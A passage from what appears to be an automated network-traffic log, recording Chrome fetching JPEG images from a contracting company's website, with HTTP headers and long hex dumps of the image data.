                                              Data Ascii: oUcc^5rXFv1+ph{\wH`3|;\;-+-p;jTTlq1\j3A2keAG.'<N=>]=JP{p?YA??/c8W7C4n7km;NIuM~ z_k~swZ`BV9w+_q_pGN
                                              2024-09-27 06:20:25 UTC8000INData Raw: fa 9a d2 22 ea de 89 fd aa a4 9c 79 bf d1 0e 5d 12 89 1e f8 8c c4 b3 65 a4 17 9f a1 a4 f1 e4 59 ae b8 8e 9c b0 bb 2b d1 1d ec b4 82 eb 5f 42 d1 be 51 2c db e6 c8 45 74 fd c7 90 ee 45 07 b9 9b 48 31 c5 75 27 e5 fb 8d d4 54 bd 9f 0b 10 95 cf 75 ec c4 b3 ec 5a 4e 04 d4 bd b5 cc b2 78 6f 4c 74 ca a3 8b e5 8f a0 92 e4 4f ba fd 8d 2a 2c 99 8f 4a 11 ec eb ea 5a 9a 6f a1 f2 7f 3a 7a 14 58 0f fd b6 7f 11 a1 3e a3 48 f9 45 9f 4c 4b 57 da 85 5f 52 34 25 df fe 8a d1 11 dc dd 36 1e cf 4a fa 13 4f 95 3f ec fe 2b f2 2c 5c b9 cb fe c8 af f3 91 38 fa 50 95 3f b8 7a 7d 46 b1 55 d5 f8 8c af fe 63 fa 86 69 1f b7 a9 8f 2f 68 a2 ea 3f f3 a9 5a 14 46 94 8a 47 9b 2d 3b 21 49 96 71 25 4c 77 60 3a dd 98 88 35 cf 02 d6 0b cc ab c0 b3 f3 23 14 4c cf 57 81 67 2e c3 8a fc 45 b2 e9 88
                                              Data Ascii: "y]eY+_BQ,EtEH1u'TuZNxoLtO*,JZo:zX>HELKW_R4%6JO?+,\8P?z}FUci/h?ZFG-;!Iq%Lw`:5#LWg.E
                                              2024-09-27 06:20:25 UTC8000INData Raw: 08 04 b8 04 23 a1 98 82 fa 94 33 12 cc e1 02 20 42 33 67 08 41 a2 10 dc c2 c2 36 e8 a0 23 09 0d 23 37 81 02 92 8b 27 d0 8b a8 22 a9 a8 12 86 31 31 73 0e ae 03 04 10 75 70 30 cb 61 93 ff 00 02 3b 7f 3a e8 d1 d5 ba 14 68 3a 0b a0 8e 16 61 26 7d 0c 3f 57 be 7c 74 65 f5 a1 d4 0c 70 98 62 a8 ba 05 7d 00 74 23 a0 c2 83 a1 ea 7e 80 8e 10 61 da 2a 85 45 84 18 0c 4e b9 b8 44 98 67 8b a2 10 a2 61 60 53 02 00 88 66 09 41 55 0a 45 08 e8 0c 06 08 71 61 82 c2 98 ff 00 e2 0b 81 12 65 f0 ff 00 19 8d 0c 06 23 2e 00 ba 88 20 ea be a0 22 10 68 42 2c 8f e0 fd e6 df c2 ce 02 80 8e 20 0a 0f a1 7d 03 14 51 f4 3f c4 0f 40 31 c3 51 85 1c 69 c3 89 d0 90 a0 7d 54 30 09 8e 81 0c 9e 99 e5 88 f1 e0 93 24 97 09 ff 00 93 10 1a 83 50 2a 10 7f 89 42 01 d4 88 07 a8 ea 20 ea 7a 1e 80 f4 2a
                                              Data Ascii: #3 B3gA6##7'"11sup0a;:h:a&}?W|tepb}t#~a*ENDga`SfAUEqae#. "hB, }Q?@1Qi}T0$P*B z*
                                              2024-09-27 06:20:25 UTC8000INData Raw: 98 28 fb 83 50 50 43 10 13 b3 64 16 39 8d 20 ab f2 e7 2a 82 bd 20 38 02 9b ea 96 24 30 41 50 05 01 14 44 1a 08 05 71 09 88 06 20 4a 13 80 8c ac 3d e0 3e b0 0f 33 6c e4 96 74 87 35 70 cb de 06 d0 02 b7 31 f0 66 78 cb cc b9 b2 5e f7 1e 48 ff 00 6c 24 bd 8b c4 58 43 fb 10 08 60 39 2f 10 b8 b6 50 a3 2a 03 53 1b 44 52 05 df 49 56 43 90 62 5c 88 83 62 21 cd 62 b3 00 23 23 4d 26 97 c4 42 10 29 b1 fa a6 37 0e 10 91 06 a2 4e 10 2c 00 91 16 a5 d1 02 b8 85 f7 44 06 56 e7 10 02 14 8b 80 06 95 da 3f 81 72 02 c2 32 90 2a a8 42 70 d1 0c 4a d9 a5 bc 25 1b 00 01 8d e0 4a 4a e6 b8 80 82 fb 25 f6 8e 01 12 d4 e8 91 9d fe d3 4d a0 c3 cc c2 1c c8 21 18 04 34 25 db 10 49 66 a8 44 2c 23 93 15 ea 14 ae 20 16 2c 1b 4e 43 58 84 8c 8a 59 79 37 1d 66 84 1d 8d 5c 3f d3 c0 3c 00 ed 00
                                              Data Ascii: (PPCd9 * 8$0APDq J=>3lt5p1fx^Hl$XC`9/P*SDRIVCb\b!b##M&B)7N,DV?r2*BpJ%JJ%M!4%IfD,# ,NCXYy7f\?<
                                              2024-09-27 06:20:25 UTC8000INData Raw: 18 c5 68 0f 10 94 28 16 d2 02 7c 34 94 48 7c 14 3d a3 21 49 5d e0 23 7b 98 e0 03 9b e3 e2 0c 4d 5e 6e 25 73 de 9c 2c 01 41 be 50 a2 16 76 c2 ed 0a 14 02 95 87 81 2c 23 a2 5a 45 1b 4d 8c fd 63 10 0c 8d a0 24 ed 6c e0 10 45 d4 59 75 02 68 7d e6 a6 ce e9 44 71 02 23 74 3b 4c cb 9f e2 4a b4 7a 42 ea a8 02 49 e0 f1 b0 ec 23 20 55 64 65 2b 92 aa 5b cb 4d 85 8f a4 01 4d 45 8c 88 4a 5a 6e 3a 76 72 91 11 3a e7 7d a1 01 67 2d 03 cd 08 40 24 10 1d f0 d2 22 06 c0 3b e0 0d 84 0d 07 14 76 3c 41 45 be a0 c4 2d a0 34 6d 7a c2 98 04 d4 70 08 1e 56 0b 41 62 b5 81 6c 40 c2 1a f5 cc b8 8a 58 0c 19 45 11 25 0d 19 e6 15 cd 4d 5c c2 f3 99 ec 5d 3f 48 00 24 09 68 1b 03 9d f7 80 c2 12 53 6e fc c2 52 47 70 06 1c 31 7f aa 11 07 dd 14 92 46 48 16 5f 30 85 01 7e 7c 41 6b 20 42 cb 86
                                              Data Ascii: h(|4H|=!I]#{M^n%s,APv,#ZEMc$lEYuh}Dq#t;LJzBI# Ude+[MMEJZn:vr:}g-@$";v<AE-4mzpVAbl@XE%M\]?H$hSnRGp1FH_0~|Ak B
                                              2024-09-27 06:20:25 UTC8000INData Raw: 8d 62 33 5a 71 48 99 b6 4f a9 c7 e8 26 4c 9f 44 fa 1c 4c 0c 99 31 32 64 c9 93 e9 30 a3 45 1c 9a 66 67 34 e7 c6 1c 0c 70 9c e1 fc 30 70 c0 e4 c9 89 30 2e 6c ae 0d 07 04 71 24 99 b2 dd 39 32 64 c9 93 26 06 48 58 51 4d 18 8e 0c 6d b8 b6 c0 62 63 e5 e9 93 26 4c 98 1f 41 06 4c 99 32 7d 0a 43 00 70 73 81 e1 f5 51 83 86 0c 7b fe 85 b0 4c 81 96 e1 93 18 d4 8d 67 1e d8 f3 8b 1b 87 cc e0 61 2a e6 c4 c4 c5 18 1b cb 06 2e 24 3f 47 0f bf f2 e1 fc fc 99 32 64 c9 93 26 4c 99 76 b0 1a c3 55 d7 18 62 2d 1c 78 84 c5 58 75 ce 1a 0a b0 9e e3 94 5c 91 9d df 44 96 d6 e0 31 66 b1 26 38 be 71 db 50 c7 7d b8 80 e3 21 93 c6 7a ef 0c 70 fd 44 c9 93 35 f4 4c 98 18 99 32 64 c9 f4 98 ab 53 02 76 f1 8c e2 86 28 23 8b 23 9e dc 3e 80 c1 93 06 0c 3b c7 11 37 88 b4 98 29 86 6e fe 93 26 4c
                                              Data Ascii: b3ZqHO&LDL12d0Efg4p0p0.lq$92d&HXQMmbc&LAL2}CpsQ{Lga*.$?G2d&LvUb-xXu\D1f&8qP}!zpD5L2dSv(##>;7)n&L
                                              2024-09-27 06:20:25 UTC8000INData Raw: c2 1e 10 5a 49 f0 38 f4 b3 79 e1 4c 31 a3 81 e0 36 cc 54 80 86 ed 9f 13 3f 03 f9 7f 2d c8 d3 31 10 bf a3 17 e6 82 f9 b8 a7 e6 95 c0 57 c0 c7 a7 cb 9f 93 10 fa 56 01 cf 45 c1 99 ad 15 bb 82 5c 66 ea 04 ed 59 93 be e3 fd cb 8e f7 c3 57 fa 0c 63 ad 01 41 db bd e1 34 d8 2f f9 43 2c 66 c4 b4 f9 d3 1a e8 6e 23 d5 6e 20 f5 53 58 bb e8 c2 ef 85 14 19 40 60 2d 2a fc 5a 13 ed 8e f8 b0 50 7b 83 ac 78 b2 2e b3 9d 21 89 69 a8 1e 0a 52 13 d4 08 9a d4 30 fd 8e 5d 64 6b 0d b8 da c4 6e 07 df ce 25 a0 48 d8 a6 b6 38 47 af 0a c9 27 0c 1d 3c 0d 5b b5 85 c9 6a ba 24 1c 68 a7 7c 20 3e c4 62 e3 d8 f0 e9 ab 29 ff 00 de 46 72 6d 11 a7 86 e1 dd 56 24 f5 7b f6 c7 5c 2a 3a fd 86 1a 33 36 4b 2e f2 f3 39 81 77 55 ac de 28 0d cf d3 ca fc e8 77 17 52 23 10 c4 84 12 35 de 46 40 78 43 85
                                              Data Ascii: ZI8yL16T?-1WVE\fYWcA4/C,fn#n SX@`-*ZP{x.!iR0]dkn%H8G'<[j$h| >b)FrmV${\*:36K.9wU(wR#5F@xC
                                              2024-09-27 06:20:25 UTC8000INData Raw: ff 00 13 53 15 75 4e 6e 3f 66 48 97 66 90 1e 46 54 62 cf fb 45 65 b9 e5 27 f6 89 8b 4f 9c 70 9a fc b6 00 78 3e 75 83 30 18 93 94 cf 9e 6d 14 a2 0c 22 98 a9 04 05 0f 39 ba 85 f5 0f be 00 78 39 24 4c 4a 57 60 01 88 bd 68 11 4a e4 3a 37 b8 1e 72 11 2e 0b ef dd c7 58 db 76 1a d7 5f 38 16 07 5e 09 bf 9c 4a 11 5f d5 f9 c4 de 0b b0 fe f2 f9 4b ab 4c 93 6a bc 98 fd a6 d4 34 18 05 90 83 f0 bc 66 f9 82 c8 8f 06 53 10 56 cb 72 74 1a 36 18 88 0f 9e 1c fd 99 c8 82 94 15 e4 f8 ca b4 8e 2d 33 97 6f 31 6b 8b 10 24 8f 15 e4 bb 71 05 92 ee a6 0e 13 7e 9c d9 44 9e b3 83 4f d0 f6 c6 e0 72 35 c9 77 28 5b 96 36 c4 c2 98 87 92 41 c1 ad eb 29 03 92 17 8c 15 8a d9 57 8f d3 92 cd fa ba 49 d6 2e 31 30 7b b3 2a b0 36 d3 ac 44 2e 9b 5a e4 6b 1b a0 1e f6 72 f5 8b 15 25 b0 f0 18 71 a3
                                              Data Ascii: SuNn?fHfFTbEe'Opx>u0m"9x9$LJW`hJ:7r.Xv_8^J_KLj4fSVrt6-3o1k$q~DOr5w([6A)WI.10{*6D.Zkr%q


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              142192.168.2.465480173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:24 UTC714OUTGET /uploads/news/4/0538734f181f0860806608250501d2ae.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:24 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:24 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:28:33 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 94270
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:24 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 06 07 03 08 ff da 00 08 01 01 00 00 00 00 e6 24 d7 00 42 6a 0a 20 00 08 00 00 00 8a 22 a0 28 00 0a 8a a2 fa 76 ef 9e 2d 04 00 10 00 14 00 14 00 50 1c 00 2a 56 c2 e8 3b
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm"$Bj "(v-P*V;
                                              2024-09-27 06:20:24 UTC8000INData Raw: a2 a2 a0 10 50 a7 d0 aa 23 9b 9d 06 c6 6d 4d c5 18 ce 72 8e 86 f5 82 a7 1f d4 d9 e7 99 1a d2 b0 96 e6 5a d2 69 eb 3d 07 00 21 9f 43 a0 00 40 0c 63 64 40 32 cd 2e 63 76 dc 74 73 73 a2 87 55 d6 74 9d c7 f5 b3 61 45 01 5e ce be 1d ed 9e 43 a6 a2 bb 9c fd fd d0 04 56 e5 6b 00 2a 2a 1c fd dd 31 a2 a7 3e 68 64 eb 66 e7 c2 92 cb 9d ad 75 95 9b 9d b7 97 14 ef 97 2f 4f 73 9b 6b e9 75 f7 73 33 96 5e 8d c2 02 91 48 02 88 a8 73 5a f7 46 e3 3b 5b 18 cf ad 04 93 3e 49 2b e6 eb 5c ac e7 e2 ce e8 2e 4a 65 cf 7e 83 7a 9e 43 5e 65 a6 b6 7a 4a b5 35 41 48 65 01 44 06 f3 1d 04 ca de 51 f7 72 eb be 47 4c c7 3d b0 d0 d1 91 eb 56 9d db 39 d2 d8 d2 c0 6d aa a5 cc fb 3a d6 ed b3 13 a7 87 99 ea 1b 38 b9 f7 c0 00 4c cc 7d bb 91 e5 63 b0 99 5c 20 aa 84 54 ae 4b 34 cc c9 d0 96 84 c3
                                              Data Ascii: P#mMrZi=!C@cd@2.cvtssUtaE^CVk**1>hdfu/Oskus3^HsZF;[>I+\.Je~zC^ezJ5AHeDQrGL=V9m:8L}c\ TK4
                                              2024-09-27 06:20:25 UTC8000INData Raw: 44 58 d1 55 14 2e b5 a7 50 82 26 99 3e 5b 52 6d e9 54 cd f3 53 fb 28 72 cd 74 79 b9 92 71 61 85 7d 10 78 69 07 c9 30 f0 9c 6f 04 a3 26 fd 38 cc ab f5 10 33 4b 6a f2 5b 4f 3a b3 66 de d9 28 fa 71 90 30 d8 8d f2 4a cc 3b a7 7c 86 cc 91 76 fa 95 1e 29 d7 61 df 27 a3 ef 16 47 34 91 79 48 dc 23 a4 83 75 39 a7 db 82 18 ca c8 fb 60 2a 40 23 d2 9c 8f f1 9c 1c 0c d4 d7 e6 c6 7f c1 b3 5f ac 9d be a3 ba 9d 8f f8 b4 17 95 d8 06 6a 87 cd 10 cf 6f c7 ec 3c 0f ef f8 69 bf ce 82 30 9d ac b4 ef 62 e0 49 06 d7 1d a3 47 24 0d e3 55 92 3e a7 3e 2b 90 c5 d6 95 23 19 fc 47 6d 40 8a 94 7d 84 51 99 65 55 18 a0 01 db d3 d3 04 4e 40 24 71 0f 2d 78 98 a9 2c ed 1c d6 e6 6e 35 61 db 21 d0 6d ca 79 58 94 26 2e 95 52 ac 65 a3 52 5e ba ed 56 31 e3 63 ec be 44 34 ca 4a 67 91 92 39 a7 fe
                                              Data Ascii: DXU.P&>[RmTS(rtyqa}xi0o&83Kj[O:f(q0J;|v)a'G4yH#u9`*@#_jo<i0bIG$U>>+#Gm@}QeUN@$q-x,n5a!myX&.ReR^V1cD4Jg9
                                              2024-09-27 06:20:25 UTC8000INData Raw: dc 1a d1 81 13 4f 26 f1 e4 53 0b 33 cb 68 f3 cb 31 f4 e6 93 e6 07 f0 85 78 c3 10 f1 b9 da ac b9 27 b6 09 a6 75 0a d2 b6 db 0c 0a 48 5e d8 b5 67 6f 48 ce 2e 9d 29 f5 65 19 a6 57 10 52 8d 07 7c bd 2c 7f 17 28 e6 37 1c fd 55 03 8e 5f ba 3a e6 d0 49 eb c0 98 ab 45 fc ce 25 11 ae dd 78 61 92 c7 52 64 4c 3a 8d 4f d2 cc f9 25 a2 fd 7e 35 db 3e 3a d9 61 ba c4 ab 4f a9 f0 d1 f5 18 13 9e d9 5d 59 ad 57 23 d2 df e5 a4 c9 59 22 64 95 c9 01 5e 16 45 0c 46 35 58 36 e4 ab b6 23 5c 87 c9 15 a3 b0 92 db 3b 3b 40 1c 88 6e 36 db 56 e3 95 62 96 24 da 42 bc 91 07 9b b7 60 3f 61 92 cd 5e 29 a3 67 96 35 c9 75 6d 30 6f f3 d9 b2 06 ea 36 a5 22 04 e9 a5 9e 12 2c 1c 37 c8 75 1a 52 6c 05 85 0d a8 fd 85 3e d5 fb c1 16 6d 96 3f 31 26 5f 1f 36 3c d1 15 4d b6 24 77 bd f9 8f 08 a1 8a 49
                                              Data Ascii: O&S3h1x'uH^goH.)eWR|,(7U_:IE%xaRdL:O%~5>:aO]YW#Y"d^EF5X6#\;;@n6Vb$B`?a^)g5um0o6",7uRl>m?1&_6<M$wI
                                              2024-09-27 06:20:25 UTC8000INData Raw: 30 b0 e4 17 df 35 33 f2 63 19 24 2e 04 6f c7 ca b4 e7 db e9 18 ba 65 96 42 fc a3 01 34 d2 db 0e ba 67 f2 d4 f7 b4 b8 34 a8 f6 07 aa c7 2c d5 48 24 44 8f 91 c7 aa 20 8a 14 d8 16 b1 17 cb f2 a2 93 4d c4 26 4e a1 ed fd 75 df ff 00 8f 04 b1 43 a7 c7 1b c1 18 e7 d4 69 ad 44 5b 6d ff 00 7c db 3b e2 ef b8 f0 b9 f6 87 84 30 45 34 92 73 40 72 ed 38 02 20 55 e2 7e 19 80 90 b0 ec fd 9d bb 6d 9b e0 53 d8 66 96 ad 1f 5b 71 81 9b dd 4e 71 ed ea b8 5e 21 eb 34 59 11 06 34 2a 41 19 78 aa c8 0b 36 c1 1e 11 30 9b 9e 0b 50 92 3b 3e 2f 4b e2 56 52 b6 65 cf 8d fd aa 59 39 13 4c 93 34 82 9c e4 7c 55 af 6d 3a 4c 92 5b b2 23 2f c0 11 93 52 bb 30 03 a3 c7 06 93 67 ff 00 12 65 68 75 18 23 e0 8b 5f 66 a5 a8 39 25 ac 2e 35 0b af 1a 23 59 4d a3 d2 e4 49 63 73 3a 9f 1b a3 e5 8c d4 46
                                              Data Ascii: 053c$.oeB4g4,H$D M&NuCiD[m|;0E4s@r8 U~mSf[qNq^!4Y4*Ax60P;>/KVReY9L4|Um:L[#/R0gehu#_f9%.5#YMIcs:F
                                              2024-09-27 06:20:25 UTC8000INData Raw: b3 f9 89 c2 30 84 d3 12 34 56 a4 e4 e1 fc b9 5a 75 ed c8 e3 c9 52 b1 3d c8 e7 e5 08 be 40 ff 00 6d e8 6d 1c 29 4b eb 59 c7 e5 b1 df f9 db 98 4e 12 d2 89 ae 87 d0 fc c1 78 08 bf c0 0f 77 d7 f0 8b fc 90 62 83 ef 32 09 4c e0 67 65 e5 37 f0 b3 00 f5 0a c9 b1 31 43 81 aa 7b 99 24 61 27 09 f7 27 dd 2c 04 9f 84 4e 65 0f a7 d4 ad 2a 7c 51 31 69 f9 f6 af 6c 29 95 9c d3 5c e8 20 fe a4 ed 8b 1c 5d cc 68 8b 5e b4 8f 2d cd da 3e d0 d1 d0 57 b6 66 1a 61 ee 5a 3d 37 d3 a2 ee 44 8a c4 da ff 00 29 4d 88 d9 9c 41 ca 53 4e 1a 23 b1 2d 6b db 88 15 aa f6 60 99 37 ea 37 11 6c 3a 64 43 a9 02 11 00 8d d6 08 38 09 01 07 4f c5 3a 40 f9 73 76 f7 9a fe 93 9a 23 be 51 9b 27 c8 ea 3e 5e 49 ee aa 87 1f 25 5f 72 ef c2 13 05 3b 66 2d 1a 08 9b a2 14 5d ef 6d fe 11 cf 1d d8 f6 fe 15 bd a7
                                              Data Ascii: 04VZuR=@mm)KYNxwb2Lge71C{$a'',Ne*|Q1il)\ ]h^->WfaZ=7D)MASN#-k`77l:dC8O:@sv#Q'>^I%_r;f-]m
                                              2024-09-27 06:20:25 UTC8000INData Raw: c4 bc 92 64 f2 4c 71 06 99 51 6c b5 e2 24 e5 c9 63 3c 3e 25 31 b0 e6 cd ab ff 00 68 5c a3 aa 2d 14 99 a1 ad 61 11 7d 91 31 ad a9 5a 1f 26 a7 71 13 1d 94 5a bb d1 72 f5 56 4f 25 c3 be 47 c2 16 cc 00 64 67 96 f2 45 41 8e 89 e0 59 13 70 ed c7 7c 15 c3 f1 53 aa fd de 89 b1 24 36 ec 71 85 ec da ac 9d ce a8 aa 8f 73 5a f5 47 b1 69 0e 5a 85 cc 28 f2 dd 3e 48 09 e0 da 19 ae 95 a2 ff 00 ed 03 ca 10 a4 b3 e1 3c a5 0a d2 6e cd 6b 92 37 9c 80 c5 35 90 3b d4 82 1d f9 6a bd ab 7a a0 f1 47 0a 28 22 c0 6c 41 bb c1 54 dd 35 3c e2 f5 ed 0f 88 9a ef 71 89 ed c5 39 93 31 15 9d d9 4f aa 75 fc f7 b9 ad 35 38 ad 6e a2 70 00 34 3a a7 41 09 ff 00 19 cb 4e cd c1 a1 d4 d1 00 f7 98 8b 94 b7 e3 75 d1 c5 5e 4a 4c 11 b4 8a 76 2f df e8 b3 15 f1 6a ef df fc c9 36 2c b5 93 3c 59 e6 bf 30
                                              Data Ascii: dLqQl$c<>%1h\-a}1Z&qZrVO%GdgEAYp|S$6qsZGiZ(>H<nk75;jzG("lAT5<q91Ou58np4:ANu^JLv/j6,<Y0
                                              2024-09-27 06:20:25 UTC8000INData Raw: ff 00 88 3d 83 fd db b1 02 88 0f a1 27 10 06 83 b1 95 2b 1d 2a 54 ae 8c 25 4e 3a 57 d1 cc b8 0d ad 66 5c ab 39 46 ad ac 9d 39 e9 5f 55 4a fa 69 fa 52 57 d7 5f 4d 74 ae b5 ff 00 91 d0 89 45 9b eb d9 05 90 4f 39 cf c2 8e f9 61 e9 cf d0 f5 e7 ff 00 37 4f a8 74 ae b5 d2 be 9a ff 00 c0 25 4a 95 f5 54 42 20 b1 32 4b d0 b5 a6 30 86 92 30 c7 82 69 22 b6 31 4f fa a8 c3 ca c6 ff 00 ec 8c 27 5a 89 2b a5 74 e7 a5 7d 35 0b 1b d2 45 96 e9 bf fc 2b ff 00 27 af 3f fb bf fb e0 bc 5c 44 55 37 24 16 41 13 cb 0f 4a aa e9 ab 76 79 6e 69 60 28 8e fa d7 fe 15 d2 a7 32 ba 68 fa 95 f5 73 d6 b3 d7 89 5d 2a 57 4a 95 f4 67 ad 4a eb 51 d6 b7 f1 12 70 7e 61 a8 56 cd 5c 67 98 35 56 75 4e f9 14 17 a8 98 8f f2 42 74 25 4a 95 8e 86 65 4a 81 2a 54 aa 8c a5 c7 47 72 a5 7d 15 f4 93 5d 68 eb
                                              Data Ascii: ='+*T%N:Wf\9F9_UJiRW_MtEO9a7Ot%JTB 2K00i"1O'Z+t}5E+'?\DU7$AJvyni`(2hs]*WJgJQp~aV\g5VuNBt%JeJ*TGr}]h
                                              2024-09-27 06:20:25 UTC8000INData Raw: bb 2d 88 cc e0 2a fb 15 e5 0b 3c 2f 4f bc f6 89 b4 fd e3 6a 2f 6c 3f 98 b0 0f 87 f2 43 55 4f 05 7f b2 01 c2 4c 81 a7 c6 c9 b6 39 5f dd b2 52 53 fc cc ca 25 c5 ef f4 0d ff 00 86 90 10 36 70 83 fb 25 6a c5 80 fd 2e 25 41 06 22 56 b2 39 9b b0 b3 43 f9 42 e5 76 fe 4a a5 c3 7e 14 85 0d 67 86 1e 94 57 b2 17 60 b7 90 cb 29 46 b5 4a c3 7e f2 83 d3 cc d3 60 f8 e2 a5 66 8b 98 22 88 9c ea 6e 8c 05 b6 89 90 9e 85 ed 0a ea 75 55 a5 b2 1a e8 e9 00 5b b2 06 82 b4 6c 1d 2e 2a a9 3b 7f b2 48 c0 a7 c5 8e 63 dc 34 5d 8f be 25 0f b0 c2 9c 76 23 df 89 27 dd 2a 87 2c d1 91 fe 11 f4 ec e8 08 bb ae f0 5a 16 d4 af 25 20 0d f9 24 b0 22 0c c1 87 ff 00 b2 9f a3 b7 01 47 27 29 51 ee c4 1a cf fb 4b 78 c3 c4 81 25 4a 82 3a 5d a5 2c 65 a4 cf b4 47 15 68 88 e0 fa 82 80 7b 4a 95 2a 54 a8
                                              Data Ascii: -*</Oj/l?CUOL9_RS%6p%j.%A"V9CBvJ~gW`)FJ~`f"nuU[l.*;Hc4]%v#'*,Z% $"G')QKx%J:],eGh{J*T
                                              2024-09-27 06:20:25 UTC8000INData Raw: 8d 05 de 82 a9 92 f3 62 3a 30 f1 41 34 24 77 0e ca e7 c0 8a f1 63 35 fc 61 32 d2 51 c6 5b 23 19 b9 56 e5 af 7b 4e 20 a1 dc 49 41 de 0b f0 9b d7 52 a8 5f b2 af ca 6b 5a b3 8f 41 2c 77 82 13 73 91 6c ca 76 bb b1 f6 e9 96 c7 82 b4 c4 08 39 8f 4b e6 0c e6 96 16 ae 7a 8c e8 1c ae 87 2a 11 8f 01 07 18 78 a4 5d 4a a2 1a ce fa 65 f0 42 95 21 66 8b f8 18 20 5b b4 6b fa 40 02 09 a5 74 32 84 58 07 2f c6 ff 00 33 73 07 2d 91 f2 cf c0 81 ed 08 0c 19 65 5c 17 0c b0 4e 7b 0f 53 38 15 5b 42 d9 0b eb 53 e6 12 69 e3 ee 04 c4 bb c0 82 87 02 46 42 57 4a 95 2b 32 a0 4a 95 2a 57 7e 8a 22 54 ac 74 7a 4a 95 2a 54 a9 ee 25 0b 74 15 49 77 83 3d 15 2a 56 65 4a cc a8 05 5a d0 6f 11 c7 c4 29 f9 cb f0 88 c7 62 d8 73 88 10 dd 73 46 72 7e 98 1c 17 23 b0 35 e7 18 01 d4 aa 64 97 b9 55 d3
                                              Data Ascii: b:0A4$wc5a2Q[#V{N IAR_kZA,wslv9Kz*x]JeB!f [k@t2X/3s-e\N{S8[BSiFBWJ+2J*W~"TtzJ*T%tIw=*VeJZo)bssFr~#5dU


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              143192.168.2.465479173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:24 UTC714OUTGET /uploads/news/5/49f7ca793fcb324d2166d6e2a915044f.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:24 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:24 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:28:52 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 85779
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:24 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 07 08 ff da 00 08 01 01 00 00 00 00 c8 59 0a ee cf ac c3 37 59 95 9d 9b d8 54 0a f9 cf 9d 4e 0e a7 1b a7 8b d9 f3 7d 56 7f 61 7d 73 f2 9d 9e 07 7f 94 d9 93 1f 87
